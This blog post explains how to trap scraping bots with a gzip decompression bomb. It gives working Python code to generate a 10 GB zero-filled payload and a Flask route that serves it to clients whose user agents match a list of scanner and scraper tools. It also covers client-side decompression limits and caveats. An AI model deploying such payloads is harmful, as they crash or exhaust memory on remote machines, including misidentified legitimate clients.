The Zip Bomb Trap - A Fun Way to Mess With Bots

Ansari
Category: Security
Time to read: 4 mins
By someone tired of dealing with bots scraping, spamming, and hammering their server
The Problem: Bots Are Everywhere, and Most Aren’t Friendly
If you’ve ever put a site online — whether it’s a blog, SaaS product, portfolio, or a half-baked side project — chances are you’ve been hit by bots. Not the good ones like Googlebot or legitimate feed scrapers, but the shady ones:
- Vulnerability scanners poking at your site for common exploits
- Spambots injecting garbage content into comment sections or forms
- Content scrapers stealing your articles and republishing them
- Crawlers that don't respect robots.txt or rate limits
I’ve had all of these hit my servers at various points, and one thing became clear:
Most of these bots don’t care about rules, and worse, they’re cheap to run — so they’re persistent.
The Idea: If You Can’t Block Them, Break Them
At some point, I stopped trying to block bots politely. I figured if they’re going to be relentless and ignore all best practices, maybe I could serve them something they’d regret asking for.
That’s when I rediscovered the old concept of zip bombs — small files that expand massively when decompressed.
- They aren't viruses.
- They aren't destructive on their own.
- They just exploit the fact that decompression can eat up huge amounts of memory.
Bots love compression. They send:
Accept-Encoding: gzip, deflate
This helps them save bandwidth. Then I came across an article showing how to turn that preference into a trap, so why not give them exactly what they're asking for?
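To see why that header matters, consider what a typical naive scraper looks like. This is a hypothetical sketch (the URL is made up), but most HTTP libraries behave exactly this way:

```python
# A hypothetical naive scraper. The requests library sends
# "Accept-Encoding: gzip, deflate" by default and transparently
# inflates the body, so the client never sees the compressed size.
import requests

resp = requests.get("https://victim.example/some-page")
html = resp.text  # gzip decompression happens here, in memory
```

The scraper never chooses to decompress; the library does it automatically based on the response headers. That default is exactly what the trap exploits.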
How the Zip Bomb Works
The idea is simple:
- You create a file full of zeroes (10 GB worth).
- You compress it using gzip; it shrinks down to roughly 10 MB (both steps are sketched below).
- You serve that ~10 MB file to bots pretending to be browsers.
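Generating the payload is the easy part. Here's a minimal Python sketch that streams 10 GB of zeroes straight through gzip, so you never need the uncompressed file on disk (the bomb.gz filename is just an illustrative choice):

```python
import gzip

CHUNK = b"\0" * (1024 * 1024)  # 1 MiB of zeroes

# Long runs of identical bytes compress at roughly 1000:1,
# so 10 GiB of input gzips down to a file of about 10 MB.
with gzip.open("bomb.gz", "wb", compresslevel=9) as f:
    for _ in range(10 * 1024):  # 10 * 1024 MiB = 10 GiB total
        f.write(CHUNK)
```

The same thing is a one-liner with dd and gzip on the command line if you prefer.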
And what happens?
- A naive bot sees the Content-Encoding: gzip header.
- It tries to decompress.
- The 10 MB becomes 10 GB in memory.
- The bot process crashes, or the server it's running on runs out of memory.
I’ve tested this. Many unsophisticated crawlers just disappear after that. They hit /trap, try to decompress, and never come back.
How I Built It
You can check out the repository for the full implementation.
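I won't duplicate the repo here, but the core idea fits in one small handler. Below is a minimal sketch using Flask; the /trap route, the user-agent blocklist, and the bomb.gz filename are illustrative assumptions rather than exactly what the repository does:

```python
from flask import Flask, Response, request

app = Flask(__name__)

# Crude heuristic for demo purposes; real bot detection is harder.
BAD_AGENTS = ("sqlmap", "nikto", "scrapy", "python-requests", "go-http-client")

# Load the ~10 MB compressed payload once at startup.
with open("bomb.gz", "rb") as f:
    PAYLOAD = f.read()

@app.route("/trap")
def trap():
    ua = request.headers.get("User-Agent", "").lower()
    if any(bad in ua for bad in BAD_AGENTS):
        # Declaring the body as gzip makes a naive client inflate
        # it to the full 10 GB while "parsing the page".
        return Response(PAYLOAD, headers={
            "Content-Encoding": "gzip",
            "Content-Type": "text/html",
        })
    return "Nothing to see here."
```

The important detail is the Content-Encoding header: the client believes it received an ordinary compressed HTML page and inflates it automatically.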
Does It Work?
Yes — but only for the kind of bots that are:
- Naive (they don't verify content type or size)
- Overly aggressive
- Poorly sandboxed
And those are usually the worst offenders. No, it’s not foolproof. Smarter bots can:
- Detect responses that inflate to abnormally large sizes
- Cap decompression limits (see the sketch below)
- Use partial reads
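That second defense is easy to see concretely. Here's a sketch of how a careful client caps decompression with Python's zlib streaming API (the 10 MB limit is an arbitrary choice for illustration):

```python
import zlib

MAX_BYTES = 10 * 1024 * 1024  # refuse anything that inflates past 10 MB

def safe_gunzip(compressed: bytes, limit: int = MAX_BYTES) -> bytes:
    # wbits = MAX_WBITS | 16 tells zlib to expect gzip framing.
    d = zlib.decompressobj(wbits=zlib.MAX_WBITS | 16)
    out = d.decompress(compressed, limit)
    if d.unconsumed_tail:  # input left over after hitting the cap
        raise ValueError("decompressed size exceeds limit; likely a bomb")
    return out
```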
But the lazy, common, script-kiddie bots? It crushes them. And since they’re automated and fire-and-forget, once they crash once, they usually don’t retry.
Trade-offs and Caveats
- You pay a small bandwidth cost (serving ~10 MB) each time the trap fires.
- You must be careful not to serve it to legit users (one safeguard is sketched below).
- It won't stop targeted attacks — just disrupt mass bots.
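On the second point, one simple safeguard (assuming the trap lives at /trap, as in the sketch earlier) is to disallow it in robots.txt. Well-behaved crawlers will never touch it, and anything that ignores the rule has self-selected as a target:

```
# robots.txt: polite crawlers skip the trap entirely
User-agent: *
Disallow: /trap
```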
But for my use case — stopping low-level crawlers from hammering endpoints — it was more than worth it.
Conclusion: Fighting Fire with Compression
You won’t find this solution in any OWASP Top 10 defense strategy. It’s a bit rogue. But it’s practical, effective, and simple. If you’re a developer tired of being passive while bots abuse your server, maybe it’s time to hit back — with a zip bomb.